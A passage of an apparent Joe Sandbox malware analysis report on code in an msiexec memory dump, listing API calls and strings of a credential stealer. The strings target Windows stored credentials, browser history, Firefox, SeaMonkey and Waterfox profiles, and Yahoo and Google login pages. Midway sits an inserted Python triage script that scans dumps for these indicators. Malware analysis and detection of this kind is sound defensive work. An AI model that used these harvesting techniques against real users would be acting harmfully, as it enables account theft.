                                                                                                          • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                        • memset.MSVCRT ref: 0040BC75
                                                                                                        • memset.MSVCRT ref: 0040BC8C
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                        • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                        • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                        • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 115830560-3916222277
                                                                                                        • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                        • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                        • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                        • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                          • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                          • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                          • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                          • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                          • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                          • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                          • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                          • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                          • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                          • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                          • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                          • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                          • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                        • _wcslwr.MSVCRT ref: 0040C817
                                                                                                          • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                          • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                        • wcslen.MSVCRT ref: 0040C82C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                        • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                        • API String ID: 2936932814-4196376884
                                                                                                        • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                        • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                        • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                        • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                                                                        Control-flow Graph

                                                                                                         Rendered graph not reproduced (the executed/not-executed colouring is not recoverable from the text). Basic blocks and the calls they make: 40bdb0-40bdce call 404363; 40bddf-40bdec CredEnumerateW; 40bdf8-40be18 call 40b2cc, wcslen; 40be1e-40be20 (loop head, re-entered from 40bf4e-40bf57); 40be26-40be42 wcsncmp; 40be48-40be77 call 40bd5d, call 404423; 40be7d-40bea3 memset; 40bea7-40beea memcpy; 40beec-40bf06 call 40b2cc, _wcsnicmp; 40bf11-40bf2d wcschr; 40bf38-40bf48 LocalFree; 40bf63-40bf6f call 40440c (final block).
                                                                                                        APIs
                                                                                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                        • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                        • wcslen.MSVCRT ref: 0040BE06
                                                                                                        • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                        • memset.MSVCRT ref: 0040BE91
                                                                                                        • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                        • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                        • wcschr.MSVCRT ref: 0040BF24
                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                        • String ID:
                                                                                                        • API String ID: 697348961-0
                                                                                                        • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                        • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                        • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                        • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
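As an added example, not part of the Joe Sandbox report and not code from the sample: a Python triage script that scans a process memory dump for the indicator groups the function summaries above list together, i.e. the psapi.dll names resolved through GetProcAddress, the WinINet URL-cache walk keyed on "visited:", the Containers / Container_%I64d strings, the three login URLs, and CredEnumerateW. The grouping into capabilities, the ASCII-plus-UTF-16LE search, the required/optional split and both sample buffers are constructed for this example and are assumptions, not findings of the report.

```python
"""Triage a memory dump for the credential-harvesting indicator groups listed
in the function summaries above.  Added example, not Joe Sandbox output and not
code from the sample; indicator grouping and sample buffers are constructed.

Every indicator is searched as ASCII and as UTF-16LE: import-table names and
GetProcAddress arguments (psapi.dll, EnumProcesses, CredEnumerateW) sit in a
dump as ASCII, while arguments of W-suffixed APIs ("visited:", the login URLs,
"Container_%I64d") are wide strings.
"""
from __future__ import annotations

# Indicator groups built from the API ID / String ID fields above (assumed grouping).
# "required": every entry must be present before the capability is reported.
# "optional": supporting evidence only; short generic strings such as "Name"
# collide with unrelated data (e.g. inside "GetModuleFileNameExW"), so they never decide.
CAPABILITIES: dict[str, dict[str, list[str]]] = {
    "process_enum_psapi": {
        "required": ["psapi.dll", "EnumProcesses", "EnumProcessModules"],
        "optional": ["GetModuleFileNameExW", "GetModuleInformation", "GetModuleBaseNameW"],
    },
    "ie_history_urlcache": {
        "required": ["FindFirstUrlCacheEntryW", "FindNextUrlCacheEntryW", "visited:"],
        "optional": ["FindCloseUrlCache"],
    },
    "webcache_containers": {
        "required": ["Containers", "Container_%I64d"],
        "optional": ["ContainerId", "Name"],
    },
    "login_url_targeting": {
        "required": ["https://login.yahoo.com/config/login",
                     "https://www.google.com/accounts/servicelogin"],
        "optional": ["http://www.facebook.com/"],
    },
    "credman_enum": {
        "required": ["CredEnumerateW"],
        "optional": ["LocalFree"],
    },
}


def find_indicator(dump: bytes, text: str) -> list[tuple[int, str]]:
    """Return (offset, encoding) for every ASCII and UTF-16LE occurrence of text."""
    hits: list[tuple[int, str]] = []
    for enc, needle in (("ascii", text.encode("ascii")),
                        ("utf-16le", text.encode("utf-16-le"))):
        start = 0
        while (pos := dump.find(needle, start)) != -1:
            hits.append((pos, enc))
            start = pos + 1
    return sorted(hits)


def triage(dump: bytes) -> dict[str, dict]:
    """Evaluate every capability group against the dump; report hits per indicator."""
    report: dict[str, dict] = {}
    for name, group in CAPABILITIES.items():
        required = {s: find_indicator(dump, s) for s in group["required"]}
        optional = {s: h for s in group["optional"] if (h := find_indicator(dump, s))}
        report[name] = {
            "present": all(required.values()),   # empty hit list -> indicator missing
            "required_hits": required,
            "optional_hits": optional,
        }
    return report


def capabilities_present(dump: bytes) -> list[str]:
    """Names of the capability groups whose required indicators all matched."""
    return [name for name, r in triage(dump).items() if r["present"]]


# Constructed sample dumps (not the real dump 0000000E.00000002.2576899980...sdmp).
def ascii_z(s: str) -> bytes:
    return s.encode("ascii") + b"\x00"

def wide_z(s: str) -> bytes:
    return s.encode("utf-16-le") + b"\x00\x00"

SAMPLE_STEALER_DUMP = b"\x00" * 16 + b"".join([
    ascii_z("psapi.dll"), ascii_z("EnumProcesses"), ascii_z("EnumProcessModules"),
    ascii_z("GetModuleFileNameExW"), ascii_z("GetModuleInformation"),
    ascii_z("FindFirstUrlCacheEntryW"), ascii_z("FindNextUrlCacheEntryW"),
    ascii_z("FindCloseUrlCache"), wide_z("visited:"),
    wide_z("Containers"), wide_z("ContainerId"), wide_z("Container_%I64d"), wide_z("Name"),
    wide_z("https://login.yahoo.com/config/login"),
    wide_z("https://www.google.com/accounts/servicelogin"),
    wide_z("http://www.facebook.com/"),
    ascii_z("CredEnumerateW"), ascii_z("LocalFree"),
]) + b"\x00" * 16

# Partial evidence only: psapi names without EnumProcessModules, plus generic strings.
SAMPLE_PARTIAL_DUMP = b"".join([
    ascii_z("psapi.dll"), ascii_z("EnumProcesses"), ascii_z("LocalFree"), wide_z("Name"),
])


if __name__ == "__main__":
    for label, dump in (("stealer", SAMPLE_STEALER_DUMP), ("partial", SAMPLE_PARTIAL_DUMP)):
        print(label, capabilities_present(dump))
        for cap, r in triage(dump).items():
            if r["present"]:
                print(f"  {cap}:", {s: [o for o, _ in h] for s, h in r["required_hits"].items()})
```

On a real dump, read the file with `open(path, "rb").read()` and pass it to `triage`; the returned offsets can be fed straight back into the disassembler to land on the string references that the listings above show (for example the "visited:" argument at the FindFirstUrlCacheEntryW call near 0040C30D). A dump that only matches partial groups, as the second sample does, is not reported as a capability, which keeps generic runtime strings like LocalFree from producing false positives.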
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00403CBF
                                                                                                        • memset.MSVCRT ref: 00403CD4
                                                                                                        • memset.MSVCRT ref: 00403CE9
                                                                                                        • memset.MSVCRT ref: 00403CFE
                                                                                                        • memset.MSVCRT ref: 00403D13
                                                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                        • memset.MSVCRT ref: 00403DDA
                                                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                                        • String ID: Waterfox$Waterfox\Profiles
                                                                                                        • API String ID: 1829478387-11920434
                                                                                                        • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                        • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                        • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                        • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00403E50
                                                                                                        • memset.MSVCRT ref: 00403E65
                                                                                                        • memset.MSVCRT ref: 00403E7A
                                                                                                        • memset.MSVCRT ref: 00403E8F
                                                                                                        • memset.MSVCRT ref: 00403EA4
                                                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                        • memset.MSVCRT ref: 00403F6B
                                                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                                        • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                        • API String ID: 1829478387-2068335096
                                                                                                        • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                        • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                        • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                        • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00403FE1
                                                                                                        • memset.MSVCRT ref: 00403FF6
                                                                                                        • memset.MSVCRT ref: 0040400B
                                                                                                        • memset.MSVCRT ref: 00404020
                                                                                                        • memset.MSVCRT ref: 00404035
                                                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                        • memset.MSVCRT ref: 004040FC
                                                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                                        • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                        • API String ID: 1829478387-3369679110
                                                                                                        • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                        • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                        • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                        • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                        APIs
                                                                                                        • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                        • API String ID: 3510742995-2641926074
                                                                                                        • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                        • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                        • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                        • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                        • GetLastError.KERNEL32 ref: 0041847E
                                                                                                        • free.MSVCRT ref: 0041848B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateErrorFileLastfree
                                                                                                        • String ID: |A
                                                                                                        • API String ID: 981974120-1717621600
                                                                                                        • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                        • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                        • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                        • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                          • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                          • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                        • memset.MSVCRT ref: 004033B7
                                                                                                        • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                        • wcscmp.MSVCRT ref: 004033FC
                                                                                                        • _wcsicmp.MSVCRT ref: 00403439
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                        • String ID: $0.@
                                                                                                        • API String ID: 2758756878-1896041820
                                                                                                        • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                        • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                        • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                        • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 2941347001-0
                                                                                                        • Opcode ID: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                                                        • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                        • Opcode Fuzzy Hash: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                                                        • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00403C09
                                                                                                        • memset.MSVCRT ref: 00403C1E
                                                                                                          • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                          • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                        • wcscat.MSVCRT ref: 00403C47
                                                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                        • wcscat.MSVCRT ref: 00403C70
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memsetwcscat$wcscpywcslen
                                                                                                        • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                        • API String ID: 2489821370-1174173950
                                                                                                        • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                        • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                        • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                        • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040A824
                                                                                                        • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                        • wcscpy.MSVCRT ref: 0040A854
                                                                                                        • wcscat.MSVCRT ref: 0040A86A
                                                                                                        • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                        • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 669240632-0
                                                                                                        • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                        • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                        • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                        • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                        APIs
                                                                                                        • wcschr.MSVCRT ref: 00414458
                                                                                                        • _snwprintf.MSVCRT ref: 0041447D
                                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                        • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                        • String ID: "%s"
                                                                                                        • API String ID: 1343145685-3297466227
